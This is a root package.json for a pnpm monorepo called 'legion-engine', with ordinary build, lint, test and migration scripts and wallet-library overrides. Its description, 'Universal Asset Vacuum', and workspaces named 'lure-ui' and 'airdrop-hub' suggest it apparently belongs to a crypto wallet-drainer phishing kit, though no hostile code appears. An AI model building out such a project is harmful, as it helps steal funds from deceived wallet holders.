{
  "name": "legion-engine",
  "version": "0.1.0",
  "private": true,
  "description": "Universal Asset Vacuum — multi-sentinel, API-first, frontend-agnostic backend",
  "engines": {
    "node": ">=20.0.0",
    "pnpm": ">=9.0.0"
  },
  "packageManager": "pnpm@9.15.9",
  "scripts": {
    "dev": "pnpm --filter @legion/api dev",
    "dev:lure": "pnpm --filter @legion/lure-ui dev",
    "dev:hub": "pnpm --filter @legion/airdrop-hub dev",
    "dev:vault": "pnpm --filter @legion/sovereign-admin dev",
    "build:clean": "node scripts/clean-pnpm-locks.mjs",
    "build:workspace": "pnpm -r --sort --workspace-concurrency=1 --filter \"./packages/*\" build && pnpm -r --sort --workspace-concurrency=1 --filter \"./apps/*\" build",
    "build": "pnpm run build:clean && pnpm run build:workspace",
    "lint": "eslint . --ext .ts,.tsx",
    "typecheck": "tsc --noEmit",
    "test": "vitest run",
    "db:migrate": "pnpm --filter @legion/core db:migrate",
    "db:generate": "pnpm --filter @legion/core db:generate"
  },
  "devDependencies": {
    "@types/node": "^20.0.0",
    "typescript": "^5.4.0",
    "eslint": "^8.57.0",
    "vitest": "^1.6.0",
    "prettier": "^3.3.0"
  },
  "pnpm": {
    "overrides": {
      "viem": "^2.48.11",
      "@wagmi/core": "2.22.1",
      "@wagmi/connectors": "6.2.0"
    }
  }
}
